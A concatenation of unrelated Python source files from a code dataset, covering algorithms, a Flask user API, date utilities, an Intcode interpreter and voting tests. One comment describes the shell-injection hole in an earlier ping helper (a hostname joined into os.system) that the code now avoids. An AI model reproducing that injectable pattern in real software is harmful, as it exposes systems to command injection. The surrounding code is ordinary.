        os.mkdir(dir)
    except FileExistsError:
        # Directory already present -- the expected no-op case.
        pass
def load_image_names_and_path(img_folder_path):
    """Collect the file names directly inside *img_folder_path*.

    Returns a 3-tuple ``(image_names, image_paths, image_names_no_suffix)``
    where each path is ``img_folder_path + '/' + name`` and the suffix-free
    names drop only the final extension.
    """
    image_names = next(os.walk(img_folder_path))[2]
    image_paths = [img_folder_path + '/' + name for name in image_names]
    image_names_no_suffix = [os.path.splitext(name)[0] for name in image_names]
    return image_names, image_paths, image_names_no_suffix
def suitable_unit(value):
    """Scale a duration in seconds to a readable unit.

    Returns ``(unit_name, scaled_value)``: hours above 3600 s, plain
    seconds below 100 s, minutes otherwise (note the 100 s threshold).
    """
    if value > 3600:
        return 'hour', value / 3600
    if value < 100:
        return 'sec', value
    return 'min', value / 60
def Display_remain_time(num_done_for_display, num_total, time_start, point_rate=0.10, show_every_epoch=False):
    '''
    Usage format: put in the end of Loop body:
    import time
    from Tianchi_utils import Display_remain_time
    ...
    # -----------------------------
    # for Display_remain_time
    time_start = time.time()
    num_done_for_display = 0
    # -----------------------------
    loop:
        ...
        num_done_for_display = Display_remain_time(num_done_for_display, n_total_image, time_start)
    end of loop
    :param num_done_for_display: num of loop already done
    :param num_total: num of total loop to run
    :param time_start: start time of first loop, after loading all the data if necessary
    :return: num_done_for_display
    '''
    num_done_for_display += 1
    point = int(num_total * point_rate)
    if point == 0:
        point = 1
    time_now = time.time()
    # Bug fix: the "finished" summary used to be an `elif` AFTER the progress
    # branch, so whenever num_total was a multiple of `point` the final
    # summary never printed. The finished check now takes precedence.
    if num_done_for_display == num_total:
        total_time = float(time_now - time_start)
        aver_time = total_time / num_total
        total_unit_str, total_time = suitable_unit(total_time)
        aver_unit_str, aver_time = suitable_unit(aver_time)
        print(' ----------------------------------------------- ')
        print(' Running Finished!')
        print(' Total time consumption: {:.2f} {:s}, average running time for each loop: {:.4f} {:s}'.format(
            total_time, total_unit_str, aver_time, aver_unit_str
        ))
        print(' ----------------------------------------------- ')
    elif num_done_for_display % point == 0 or show_every_epoch:
        remain_time = float(time_now - time_start) * (num_total - num_done_for_display) / num_done_for_display
        remain_unit_str, remain_time = suitable_unit(remain_time)
        print('    Already done {:d}/{:d} ({:.2f}%), est remain time: {:.2f} {:s}'.format(
            num_done_for_display, num_total, num_done_for_display / num_total * 100, remain_time, remain_unit_str
        ))
    elif num_done_for_display == 1:  # start successfully
        print(' ----------------------------------------------- ')
        print(' Start Running Successfully! Already done 1/{:d}'.format(num_total))
        print(' The remain time of this task will be automatically estimated and showed every {}%.'.format(point_rate*100))
    return num_done_for_display
def reverse(st, a, b) :
    """Return *st* with the slice from index a to b (inclusive) reversed.

    b is clamped to the last valid index, matching the original guard.
    Fixed: stray debug ``print`` calls that polluted stdout were removed,
    and the manual swap loop is replaced by slicing.
    """
    if b >= len(st):
        b = len(st) - 1
    if a > b:
        # Nothing to reverse -- the original swap loop also did no work here.
        return st
    return st[:a] + st[a:b + 1][::-1] + st[b + 1:]
# Demo: reverse the inclusive slice [6, 56] (clamped to the last index).
print(reverse('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',6,56))
# def solve(s,a,b):
#     return s[:a]+s[a:b+1][::-1]+s[b+1:]
38ae95963dd2463d1e463affd3caa1ba071021e7 | Python | jnoob/algorithms | /py/leetcode/dp/_010_regexMatch.py | UTF-8 | 275 | 2.890625 | 3 | [] | no_license |
class Solution:
    """LeetCode 10 -- regular-expression matching with '.' and '*'."""

    def isMatch(self, s: str, p: str) -> bool:
        """Return True if pattern *p* (supporting '.' and '*') matches all of *s*.

        Bottom-up DP: dp[i][j] is True when s[:i] matches p[:j]. The
        original body only assigned locals and implicitly returned None,
        so it never matched anything.
        """
        m, n = len(s), len(p)
        dp = [[False] * (n + 1) for _ in range(m + 1)]
        dp[0][0] = True
        # Patterns like "a*" or "a*b*" can match the empty string.
        for j in range(2, n + 1):
            if p[j - 1] == '*':
                dp[0][j] = dp[0][j - 2]
        for i in range(1, m + 1):
            for j in range(1, n + 1):
                if p[j - 1] == '*':
                    # Zero occurrences of p[j-2], or one more occurrence.
                    dp[i][j] = dp[i][j - 2] or (
                        dp[i - 1][j] and (p[j - 2] == '.' or p[j - 2] == s[i - 1])
                    )
                elif p[j - 1] == '.' or p[j - 1] == s[i - 1]:
                    dp[i][j] = dp[i - 1][j - 1]
        return dp[m][n]

    def findStarts(self, p):
        """Return the indices of every '*' in *p*.

        Fixed: the original appended the character itself instead of its
        position, despite the variable being named ``indexs``.
        """
        return [i for i, ch in enumerate(p) if ch == '*']
| true |
bc10a8701c9dd90eca216068f4bfe9b2eb6adc95 | Python | mbg17/superlist | /day15/shujuku.py | UTF-8 | 1,780 | 2.65625 | 3 | [] | no_license | #1,luyuan,23,13020166103,IT
# Column-index lookup: maps a field name to its position in one CSV row
# (rows look like: 1,luyuan,23,13020166103,IT).
dic={'name':1,'id':0,'age':2,'telephone':3,'job':4}
def read_file(filename):
    """Yield one record per line of *filename*: the raw line split on commas.

    Note: the trailing newline stays attached to the last field.
    """
    with open(filename, encoding='utf-8') as handle:
        for line in handle:
            yield line.split(',')
# Yield every record of the 'userinfo' table that satisfies the condition.
def filter_detail(detail):
    """Filter rows by a single comparison such as "age >= 19".

    The column name is resolved through the module-level ``dic`` mapping;
    supported operators are >=, >, <=, < and =. Fixes: the plain '<'
    branch compared with '>' (inverted result), and the operator branches
    were independent ``if`` statements, so a condition like "age >= 19"
    also fell through into the '=' branch; they are now an elif chain.
    """
    rows = read_file('userinfo')
    if '>=' in detail:
        col, val = detail.strip().split('>=')
        matches = lambda a, b: a >= b
    elif '>' in detail:
        col, val = detail.strip().split('>')
        matches = lambda a, b: a > b
    elif '<=' in detail:
        col, val = detail.strip().split('<=')
        matches = lambda a, b: a <= b
    elif '<' in detail:
        # Was `a > b` in the original -- inverted the filter.
        col, val = detail.strip().split('<')
        matches = lambda a, b: a < b
    elif '=' in detail:
        col, val = detail.strip().split('=')
        matches = lambda a, b: a == b
    else:
        return
    idx = dic[col.strip()]
    target = int(val.strip())
    for row in rows:
        if matches(int(row[idx]), target):
            yield row
# Print the requested fields of every matching row.
def views(tj,shuju):
    # tj: comma-separated field names or '*'; shuju: iterable of CSV rows.
    # NOTE: the local `views` shadows this function's own name.
    if tj =='*':
        views=['id','name','age','telephone','job']
    else:
        views = tj.strip().split(',')
    for s in shuju:
        lists = []
        for v in views:
            lists.append(s[dic[v.strip()]].strip())
        print(lists)
# Minimal SQL-ish demo: split the query on 'where', then print the selected
# columns (views) of the rows that pass the filter.
ret = 'select id, name, age where age <=19'
result= ret.split('where')
val = result[0].replace('select','').strip()
tiaojian = result[1].strip()
views(val,filter_detail(tiaojian))
da6b1b75544d866e65f11126fee5f96a442cae59 | Python | justinlboyer/earnscrape | /make_db.py | UTF-8 | 4,310 | 2.765625 | 3 | [] | no_license | import datetime
from dateutil.relativedelta import relativedelta
import json
import logging
import os
from tqdm import tqdm
# Log to a file, overwriting it on every run; DEBUG level for everything.
logging.basicConfig(filename="instantiate_db.log",
                    format='%(asctime)s %(message)s',
                    filemode='w')
logger=logging.getLogger()
logger.setLevel(logging.DEBUG)
def get_all_entries(earnings_data_path):
    """Return every entry (ticker directory name) under *earnings_data_path*."""
    get_all = os.listdir(earnings_data_path)
    logger.debug(f"Retrieved {len(get_all)} tickers")
    return get_all
def instatiate_db(earnings_data_path):
    """Build the metadata dict for every ticker folder, skipping 'metadata'."""
    # NOTE: the name keeps its original typo ('instatiate') -- callers use it.
    get_all = get_all_entries(earnings_data_path)
    scape_dict = {}
    for ticker in tqdm(get_all):
        if ticker != 'metadata':
            dates = get_all_dates(ticker)
            scape_dict[ticker] = create_entry_for_ticker(ticker, dates)
        else:
            logger.debug(f"Removed {ticker} from db")
    return scape_dict
def get_all_dates(ticker, earnings_data_path='./data'):
    """Parse earnings dates from the file names in <earnings_data_path>/<ticker>."""
    get_dates = os.listdir(f'{earnings_data_path}/{ticker}')
    datetime_list = parse_dates(get_dates)
    return datetime_list
def create_entry_for_ticker(ticker, dates):
    """Assemble one ticker's metadata record (all values formatted as strings)."""
    missing_dates = find_missing_quarters(dates)
    ticker_dict = {
        'earliest_earnings': human_readable_datetimes(min(dates))
        , 'most_recent_earnings': human_readable_datetimes(max(dates))
        ,'missed_quarters': human_readable_datetimes(missing_dates)
        , 'created_at': human_readable_datetimes(datetime.datetime.now())
        , 'updated_at': human_readable_datetimes(datetime.datetime.now())
    }
    return ticker_dict
def human_readable_datetimes(dates):
    """Format dates for JSON output.

    Accepts a datetime ('%Y-%m-%d %H:%M:%S'), a date ('%Y-%m-%d'), a list
    of dates (each '%Y-%m-%d'), or an already-formatted string (returned
    unchanged). Any other type yields None, as before. Uses isinstance
    instead of the ``type(...) is`` anti-pattern; datetime is checked
    before date because datetime is a date subclass.
    """
    if isinstance(dates, datetime.datetime):
        return dates.strftime('%Y-%m-%d %H:%M:%S')
    if isinstance(dates, datetime.date):
        return dates.strftime('%Y-%m-%d')
    if isinstance(dates, list):
        return [dte.strftime('%Y-%m-%d') for dte in dates]
    if isinstance(dates, str):
        return dates
def save_dict(scrape_dict, path):
    """Serialize *scrape_dict* to *path* as JSON with sorted keys."""
    with open(path, 'w') as out_file:
        out_file.write(json.dumps(scrape_dict, sort_keys=True))
def parse_dates(date_list):
    """Convert names like '2020_01_31.json' into datetime.date objects.

    The final five characters (the '.json' suffix) are stripped before
    parsing the leading '%Y_%m_%d' portion.
    """
    parsed = []
    for raw_name in date_list:
        parsed.append(datetime.datetime.strptime(raw_name[:-5], '%Y_%m_%d').date())
    return parsed
def covert_dates_datetimes(date_list):
    """Normalize *date_list* into datetime.date objects.

    Accepts a date/datetime (returned as-is), a list of 'YYYY-MM-DD' or
    'YYYY_MM_DD' strings (each converted), a single such string, or any
    other value (returned unchanged). Fixes: the underscore list branch
    parsed with the dash format '%Y-%m-%d' and always raised ValueError;
    an empty list no longer raises IndexError; a plain string without a
    separator is returned instead of silently becoming None.
    """
    if isinstance(date_list, (datetime.date, datetime.datetime)):
        return date_list
    if isinstance(date_list, list):
        if date_list and '-' in date_list[0]:
            return [datetime.datetime.strptime(dte, '%Y-%m-%d').date() for dte in date_list]
        if date_list and '_' in date_list[0]:
            return [datetime.datetime.strptime(dte, '%Y_%m_%d').date() for dte in date_list]
        return date_list
    if isinstance(date_list, str):
        if '-' in date_list:
            return datetime.datetime.strptime(date_list, '%Y-%m-%d').date()
        if '_' in date_list:
            return datetime.datetime.strptime(date_list, '%Y_%m_%d').date()
        return date_list
    return date_list
def find_missing_quarters(dates):
    """Return month-end dates of expected quarters that have no entry.

    Walks in 3-month steps from the earliest month-end among *dates* up
    to today, collecting each step that matches no known month-end.
    """
    now = datetime.datetime.now().date()
    three_mon_rel = relativedelta(months=3)
    last_day_date_list = [last_day_of_month(dte) for dte in dates]
    on_date = min(last_day_date_list)
    three_months_from_on = on_date + three_mon_rel
    missing_dates = []
    while three_months_from_on <= now:
        test = any([three_months_from_on==dte for dte in last_day_date_list])
        if test is False:
            missing_dates.append(three_months_from_on)
        three_months_from_on = last_day_of_month(three_months_from_on + three_mon_rel)
    return missing_dates
def last_day_of_month(datetime_date):
    """Return the last day of the month containing *datetime_date*."""
    datetime_date = covert_dates_datetimes(datetime_date)
    next_month = datetime_date.replace(day=28) + datetime.timedelta(days=4) # this will never fail
    return next_month - datetime.timedelta(days=next_month.day)
if __name__ == '__main__':
    # Scan ./data, build the per-ticker metadata dict, and persist it as JSON.
    earnings_data_path = './data'
    metadata_save_path = f'{earnings_data_path}/metadata/metadata.json'
    logger.debug(f"Searching: {earnings_data_path}")
    db_dict = instatiate_db(earnings_data_path)
    logger.debug(f"Generated {len(db_dict)} entries for db")
    logger.debug(f"Saving to {metadata_save_path}")
    save_dict(db_dict, metadata_save_path)
| true |
a44a08a1a3218fd6b6a66eb0c3189911801535a1 | Python | akerusan-s/flask-project | /data/users_resource.py | UTF-8 | 3,853 | 2.734375 | 3 | [] | no_license | from flask_restful import reqparse, abort, Resource
from data import db_session
from .__all_models import User
from flask import jsonify
# Request parser shared by the PUT and POST handlers.
parser = reqparse.RequestParser()
parser.add_argument("surname")
parser.add_argument("name")
parser.add_argument("email")
parser.add_argument("password")
def abort_if_user_not_found(user_id):
    """Abort the request with 404 when no user with *user_id* exists."""
    session = db_session.create_session()
    user = session.query(User).get(user_id)  # the user record, or None
    if not user:
        abort(404, message=f"User {user_id} not found")
def abort_if_user_no_permission(user_id, password):
    """Abort the request with 403 unless *password* matches the user's password."""
    session = db_session.create_session()
    user = session.query(User).get(user_id)
    # The actual check, same as at login time.
    if not user.check_password(password):
        abort(403, message=f"No permission for user: {user_id} - wrong password")
class UsersResource(Resource):
    """REST API for a single user (docstrings translated from Russian)."""
    def get(self, user_id, password):
        """Handle GET requests."""
        abort_if_user_not_found(user_id)
        session = db_session.create_session()
        user = session.query(User).get(user_id)
        # More fields are exposed when the correct password is supplied.
        if user.check_password(password):
            return jsonify({'user': user.to_dict(only=("id", "surname", "name", "email", "shops_created",
                                                       "liked_goods", "liked_shops", "modified_date"))})
        return jsonify({'user': user.to_dict(only=("id", "surname", "name", "email", "shops_created"))})
    def delete(self, user_id, password):
        """Handle DELETE requests."""
        abort_if_user_not_found(user_id)
        abort_if_user_no_permission(user_id, password)
        session = db_session.create_session()
        user = session.query(User).get(user_id)
        session.delete(user)  # delete the requested user
        session.commit()
        return jsonify({'success': 'OK'})
    def put(self, user_id, password):
        """Handle PUT requests."""
        abort_if_user_not_found(user_id)
        abort_if_user_no_permission(user_id, password)
        args = parser.parse_args()
        session = db_session.create_session()
        user = session.query(User).get(user_id)
        # Update only the fields present in the request.
        if args["surname"]:
            user.surname = args["surname"]
        if args["name"]:
            user.name = args["name"]
        if args["email"]:
            user.email = args["email"]
        if args["password"]:
            user.set_password(args["password"])
        session.commit()
        return jsonify({'success': 'OK'})
class UsersListResource(Resource):
    """REST API for the user collection (docstrings translated from Russian)."""
    def get(self):
        """Handle GET requests."""
        session = db_session.create_session()
        users = session.query(User).all()
        return jsonify({'users': [item.to_dict(only=("id", "surname", "name", "email", "shops_created")) for item in users]})
    def post(self):
        """Handle POST requests."""
        args = parser.parse_args()
        session = db_session.create_session()
        # Create the user; the remaining columns keep their defaults.
        user = User(
            surname=args["surname"],
            name=args["name"],
            email=args["email"],
        )
        user.set_password(args["password"])
        session.add(user)
        session.commit()
        return jsonify({'success': 'OK'})
| true |
dee8d730df27b7b684b38d6136724dbd96864f7a | Python | FernandaDR/Programaci-n | /examenes1/examen1_coronavirus.py | UTF-8 | 1,414 | 3.5 | 4 | [] | no_license | #----------------mensajes-------------
MENSAJE_BIENVENIDA = "Bienvenido,"
MENSAJE_BIENVENIDO_II = " a continuación será evaluado para determinar su estado de salud."
MENSAJE_NOMBRE = "Por favor introduzc su nombre \n "
MENSAJE_TEMP = "Por favor intraduzca la temperatura actual de su cuerpo \n"
MENSAJE_LUGAR = "Por favor ingrese su lugar de procedencia \n"
MENSAJE_OBSERVACION = "Usted se encuentra en estado de observacion"
MENSAJE_SALUDABLE = "Usted se encuentra en estado saludable"
MENSAJE_HIPOTERMIA = "Usted se encuentra en estado de hipotermia"
MENSAJE_ALERTA = "Usted se encuentra en estado de alerta"
MENSAJE_PELIGRO = "Usted se encuentra en estado de peligro"
# -------------- inputs (entradas) -------------
_nombrePersona = ""
T = 0.0
_lugar_procedencia = ""
# -------------- variables -----------
T = 0.0
A = "China"
B = "Iran"
C = "Italia"
# ------------- code (codigo) ---------------
_nombrePersona = input(MENSAJE_NOMBRE)
T = float(input(MENSAJE_TEMP))
_lugar_procedencia = input(MENSAJE_LUGAR)
print(MENSAJE_BIENVENIDA, _nombrePersona, MENSAJE_BIENVENIDO_II)
# Anyone arriving from a listed country is put under observation outright.
if(_lugar_procedencia == A) or (_lugar_procedencia == B) or (_lugar_procedencia == C):
    print(MENSAJE_OBSERVACION)
else:
    if(T>=36) and (T<=38.4):
        print(MENSAJE_SALUDABLE)
    elif(T<36):
        print(MENSAJE_HIPOTERMIA)
    elif(T>=38.5) and (T<=40):
        print(MENSAJE_ALERTA)
    else:
        print(MENSAJE_PELIGRO)
| true |
6dccc78dc5c85c78fbd45fe14b5b3a72eb511415 | Python | Skaft/aoc | /2019/day5/aoc5-pruned.py | UTF-8 | 4,879 | 3.515625 | 4 | [] | no_license | """
My attempt to tidy up the intcode computer.
The main issue was finding a consistent and clear way of handling parameter
modes. In the end I landed with a decorator. It allows me to replace parameters
according to their mode before a function gets them, as well as to bypass this
system in a flexible way by marking individual parameters as non-replaceable.
I used Enum for Opcodes and Parameter modes, mostly to try out Enum. But it
grants some extra readability, and also lets me map Computer methods to opcodes
by name. Still unsure if this is just redundant and/or silly, and that I should
be mapping integers to methods/functions using a dict or something.
"""
from input import data
from enum import Enum
from functools import wraps
from itertools import zip_longest
class Opcode(Enum):
    """Names of the opcode methods"""
    # Each member name maps (lowercased) to a Computer method: _add, _mul, ...
    ADD = 1
    MUL = 2
    INPUT = 3
    OUTPUT = 4
    JUMP_TRUE = 5
    JUMP_FALSE = 6
    LESS_THAN = 7
    EQUALS = 8
    EXIT = 99
class ParameterMode(Enum):
    """Parameter modes recognized by the Computer"""
    POSITION = 0
    IMMEDIATE = 1
    DEFAULT = 0  # Enum aliasing: same value, so DEFAULT *is* POSITION
# Just an alias
Mode = ParameterMode
def moded(skip=None):
    """
    Decorator for replacing Computer method params according to their mode.
    The optional 'skip' argument can be an int or an iterable of ints, marking
    (by index) parameters that should not be replaced regardless of their mode.
    """
    if skip is None:
        skip = []
    elif isinstance(skip, int):
        skip = [skip]
    def deco(method):
        @wraps(method)
        def wrapper(comp_inst, *params, modes=None):
            if modes is None:
                modes = []
            params = list(params)
            # Params without an explicit mode default to POSITION (Mode.DEFAULT).
            prm_mode_pairs = zip_longest(params, modes, fillvalue=Mode.DEFAULT)
            for i, (prm, mode) in enumerate(prm_mode_pairs):
                if i in skip or mode == Mode.IMMEDIATE:
                    pass
                elif mode == Mode.POSITION:
                    params[i] = comp_inst.get(prm)
                else:
                    raise ValueError(f'Unknown parameter mode: {mode}')
            return method(comp_inst, *params)
        # The number of parameters needs to be known before calling, so that
        # the parameters can be read properly. Reading it from the decorated
        # function and sticking it on the wrapper (subtracting 1 to account for
        # the "self" arg) to avoid redundant storage, though a bit hacky
        wrapper.param_count = method.__code__.co_argcount - 1
        return wrapper
    return deco
class Computer:
    """Intcode interpreter: `program` is mutable memory, `io` the single
    input/output register, `pointer` the instruction pointer."""
    def __init__(self, program, io=0, pointer=0):
        self.program = program
        self.io = io
        self.pointer = pointer
    def set(self, position, value):
        self.program[position] = value
    def get(self, position):
        return self.program[position]
    @moded()
    def _jump_true(self, n, position):
        if n != 0:
            self.pointer = position
    @moded()
    def _jump_false(self, n, position):
        if n == 0:
            self.pointer = position
    @moded(skip=2)
    def _add(self, a, b, position):
        self.set(position, a + b)
    @moded(skip=2)
    def _mul(self, a, b, position):
        self.set(position, a * b)
    @moded(skip=0)
    def _input(self, position):
        self.set(position, self.io)
    @moded()
    def _output(self, value):
        self.io = value
    @moded(skip=2)
    def _less_than(self, a, b, position):
        self.set(position, a < b)  # stores a bool; bool is an int subclass
    @moded(skip=2)
    def _equals(self, a, b, position):
        self.set(position, a == b)  # stores a bool; bool is an int subclass
    @staticmethod
    def parse_opcode(value):
        """Split a number into opcode and parameter mode components"""
        modes_int, codepoint = divmod(value, 100)
        opcode = Opcode(codepoint)
        param_modes = []
        while modes_int:
            modes_int, mode = divmod(modes_int, 10)
            param_modes.append(Mode(mode))
        return opcode, param_modes
    def run(self):
        """Execute instructions until EXIT (opcode 99)."""
        while True:
            # read and parse the value at the pointer
            points_to = self.get(self.pointer)
            opcode, param_modes = self.parse_opcode(points_to)
            if opcode == Opcode.EXIT:
                break
            # collect the method matching the opcode
            method = getattr(self, f"_{opcode.name.lower()}")
            # collect parameters
            param_start = self.pointer + 1
            next_instr_start = param_start + method.param_count
            params = map(self.get, range(param_start, next_instr_start))
            # moving pointer before calling to not overwrite jump instructions
            self.pointer = next_instr_start
            method(*params, modes=param_modes)
# Run the program for both puzzle inputs (io=1 and io=5) and print the
# final io register after each run.
for start_value in (1, 5):
    comp = Computer(data.copy(), start_value)
    comp.run()
    print(comp.io)
| true |
9fe66a9b139921de5401a2e759cb4bb89f6c3bcd | Python | format37/tfodModelBanknotes | /using/lex.py | UTF-8 | 1,416 | 2.5625 | 3 | [] | no_license | import os
import requests
from datetime import datetime
def host_check(hostname):
    """Return True when *hostname* answers a single ping.

    Security fix: the original built a shell command by string
    concatenation (``os.system("ping -c 1 " + hostname)``), which allowed
    shell injection through *hostname*; subprocess with an argument list
    never invokes a shell.
    """
    import subprocess  # local import keeps the module's import block unchanged
    return subprocess.call(["ping", "-c", "1", hostname]) == 0
def send_to_telegram(chat,message):
    """Relay *message* to Telegram chat *chat* via the scriptlab.net relay bot.

    NOTE(review): *message* is concatenated into the URL without escaping;
    non-URL-safe text will break the request -- consider urlencoding it.
    """
    headers = {
        "Origin": "http://scriptlab.net",
        "Referer": "http://scriptlab.net/telegram/bots/relaybot/",
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'}
    url = "http://scriptlab.net/telegram/bots/relaybot/relaylocked.php?chat="+chat+"&text="+message
    requests.get(url,headers = headers)
class filedate:
    """Parse a timestamp embedded in a file name into string fields."""

    def __init__(self):
        # All components start out as the string "0" (fields are strings, not ints).
        self.year = "0"
        self.month = "0"
        self.day = "0"
        self.hour = "0"
        self.minute = "0"
        self.second = "0"

    def update(self, filename):
        # Keep everything from the first '2' onward (only works for years 2xxx).
        stamp = filename[filename.find("2"):]
        self.year = stamp[0:4]
        self.month = stamp[5:7]
        self.day = stamp[8:10]
        self.hour = stamp[11:13]
        self.minute = stamp[14:16]
        self.second = stamp[17:19]

    def sqlFormat(self):
        # "YYYY-MM-DDTHH:MM:SS" built from the stored string fields.
        date_part = "-".join((self.year, self.month, self.day))
        time_part = ":".join((self.hour, self.minute, self.second))
        return date_part + "T" + time_part

    def dateFormat(self):
        # Convert the string fields into a real datetime object.
        return datetime(int(self.year), int(self.month), int(self.day),
                        int(self.hour), int(self.minute), int(self.second))
| true |
cdde07bd3bee6cf2111d251a7359b0dcaa0d2253 | Python | 19mddil/Python | /miscellenous/chapter2/panic.py | UTF-8 | 295 | 3.359375 | 3 | [] | no_license | phrase = "Don't panic!"
plist = list(phrase)#turing string into list
print(phrase)
print(plist)
# plist[1:3] of "Don't panic!" -> "on"
new_phrase = "".join(plist[1:3])
print(new_phrase)
# plist[5] + plist[4] -> " t" (the space, then 't')
new_phrase = new_phrase+"".join([plist[5],plist[4]])
print(new_phrase)
# plist[7:5:-1] walks backwards over 'a','p' -> "ap", giving "on tap"
new_phrase = new_phrase+"".join(plist[7:5:-1])
print(plist)
print(new_phrase)
766eb3e55833a4af8e8e9d788ddaa6096b9b7b7a | Python | Cenibee/PYALG | /python/fromBook/chapter6/tree/47-serialize-and-deserialize-binary-tree/47-m.py | UTF-8 | 2,610 | 3.9375 | 4 | [] | no_license | # Definition for a binary tree node.
from typing import Deque, List
class TreeNode(object):
    """Plain binary-tree node: a value and left/right child links."""
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
class Codec:
    """Binary-tree (de)serializer.

    Format: leaf -> "<val>"; inner node -> "<val>:<left>|<right>";
    an absent subtree -> "n". ``pos`` is the class-level parse cursor used
    by deserialize and reset to 0 after each call.
    """
    def serialize(self, root: TreeNode):
        """Encodes a tree to a single string.
        :type root: TreeNode
        :rtype: str
        """
        def partial_serialize(node: TreeNode) -> List[str]:
            if not node:
                return ['n']
            elif not node.left and not node.right:
                return [str(node.val)]
            else:
                return [str(node.val), ':',\
                        *partial_serialize(node.left), '|',\
                        *partial_serialize(node.right)]
        return ''.join(partial_serialize(root))
    pos = 0
    def deserialize(self, data: str) -> TreeNode:
        """Decodes your encoded data to tree.
        :type data: str
        :rtype: TreeNode
        """
        # Starts positioned at a value and finishes positioned at a value
        # (translated from the original Korean comment).
        def partial_deserialize() -> TreeNode:
            if self.pos >= len(data):
                return None
            if data[self.pos] == 'n':
                self.pos += 1
                node = None
            else:
                start = self.pos
                while len(data) > self.pos and\
                        (data[self.pos] != ':' and data[self.pos] != '|'):
                    self.pos += 1
                node = TreeNode(int(data[start:self.pos]))
                self.pos += 1
                if self.pos < len(data) and data[self.pos - 1] == ':':
                    self.pos += 1
                    node.left = partial_deserialize()
                    node.right = partial_deserialize()
            return node
        result = partial_deserialize()
        self.pos = 0
        return result
# Your Codec object will be instantiated and called as such:
# ser = Codec()
def fulfil_tree(l: List[int]) -> TreeNode:
    """Build a binary tree from a level-order list (falsy entries mark a
    missing child -- NOTE: a value of 0 is therefore treated like None)."""
    root = TreeNode(l[0])
    q = Deque([root])
    i = 1
    while q and i < len(l):
        node = q.popleft()
        if l[i]:
            node.left = TreeNode(l[i])
            q.append(node.left)
        i += 1
        if i >= len(l):
            break
        if l[i]:
            node.right = TreeNode(l[i])
            q.append(node.right)
        i += 1
    return root
# deser = Codec()
# print(deser.serialize(fulfil_tree([1,2,3,None,None,4,5])))
# ans = deser.deserialize('10:22|33:44:66|n|51')
# Round-trip smoke test: serialize a sample tree and parse it back.
deser = Codec()
tree = fulfil_tree([1,2,3,None,None,4,5,6,7])
test = deser.serialize(tree)
a = deser.deserialize(test)
print('test')
def check_index(key):
    """Validate *key* as an index into an (infinite) sequence.

    The key must be a non-negative integer: raise TypeError when it is
    not an int and IndexError when it is negative (the sequence is
    conceptually infinite, so there is no upper bound).
    (Docstring translated from Chinese; messages added to the bare raises.)
    """
    if not isinstance(key, int):
        raise TypeError('sequence indices must be integers')
    if key < 0:
        raise IndexError('sequence index cannot be negative')
class ArithmeticSequence:
    """Infinite arithmetic sequence with per-index user overrides.

    (Docstrings translated from Chinese.)
    """
    def __init__(self, start=0, step=1):
        """
        Initialize the arithmetic sequence.
        start   - the first value of the sequence
        step    - the difference between two adjacent values
        changed - a dict of values the user has overridden
        """
        self.start = start
        self.step = step
        # Bug fixed: __init__ created `self.change` while __setitem__ wrote
        # `self.changed`, so assignment raised AttributeError and overrides
        # were never visible to __getitem__. Unified on `changed`.
        self.changed = {}
    def __getitem__(self, key):
        """
        Fetch one element of the sequence, preferring a user override.
        """
        check_index(key)
        try: return self.changed[key]  # overridden?
        except KeyError:  # not overridden: compute the value
            return self.start + key * self.step
    def __setitem__(self, key, value):
        """
        Override one element of the sequence.
        """
        check_index(key)
        self.changed[key] = value
# Demo: start=1, step=3 -> prints 1, 4, 7, 10, 13, then overrides index 3.
s = ArithmeticSequence(1, 3)
print(s[0])
print(s[1])
print(s[2])
print(s[3])
print(s[4])
s[3] = 2
| true |
50f8ab978497151974d1bf2f3b54b3451b4dd18f | Python | yaniv14/OpenCommunity | /src/shultze/test_functionality/test_plurality.py | UTF-8 | 2,878 | 2.75 | 3 | [
"BSD-2-Clause"
] | permissive | # Copyright (C) 2009, Brad Beattie
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from shultze.pyvotecore.plurality import Plurality
import unittest
class TestPlurality(unittest.TestCase):
    """Unit tests for Plurality.

    Modernized: the deprecated ``self.assert_`` alias (removed in Python
    3.12) is replaced with ``assertIn``; the ``input`` locals that
    shadowed the builtin are renamed; set literals replace ``set([...])``.
    """
    # Plurality, no ties
    def test_no_ties(self):
        # Generate data
        votes = [
            {"count": 26, "ballot": "c1"},
            {"count": 22, "ballot": "c2"},
            {"count": 23, "ballot": "c3"}
        ]
        output = Plurality(votes).as_dict()
        # Run tests
        self.assertEqual(output, {
            'candidates': {'c1', 'c2', 'c3'},
            'tallies': {'c3': 23, 'c2': 22, 'c1': 26},
            'winner': 'c1'
        })
    # Plurality, alternate ballot format
    def test_plurality_alternate_ballot_format(self):
        # Generate data
        votes = [
            {"count": 26, "ballot": ["c1"]},
            {"count": 22, "ballot": ["c2"]},
            {"count": 23, "ballot": ["c3"]}
        ]
        output = Plurality(votes).as_dict()
        # Run tests
        self.assertEqual(output, {
            'candidates': {'c1', 'c2', 'c3'},
            'tallies': {'c3': 23, 'c2': 22, 'c1': 26},
            'winner': 'c1'
        })
    # Plurality, irrelevant ties
    def test_irrelevant_ties(self):
        # Generate data
        votes = [
            {"count": 26, "ballot": "c1"},
            {"count": 23, "ballot": "c2"},
            {"count": 23, "ballot": "c3"}
        ]
        output = Plurality(votes).as_dict()
        # Run tests
        self.assertEqual(output, {
            'candidates': {'c1', 'c2', 'c3'},
            'tallies': {'c3': 23, 'c2': 23, 'c1': 26},
            'winner': 'c1'
        })
    # Plurality, relevant ties
    def test_relevant_ties(self):
        # Generate data
        votes = [
            {"count": 26, "ballot": "c1"},
            {"count": 26, "ballot": "c2"},
            {"count": 23, "ballot": "c3"}
        ]
        output = Plurality(votes).as_dict()
        # Run tests
        self.assertEqual(output["tallies"], {'c1': 26, 'c2': 26, 'c3': 23})
        self.assertEqual(output["tied_winners"], {'c1', 'c2'})
        self.assertIn(output["winner"], output["tied_winners"])  # was deprecated self.assert_
        self.assertEqual(len(output["tie_breaker"]), 3)
if __name__ == "__main__":
    unittest.main()  # run the suite when this module is executed directly
| true |
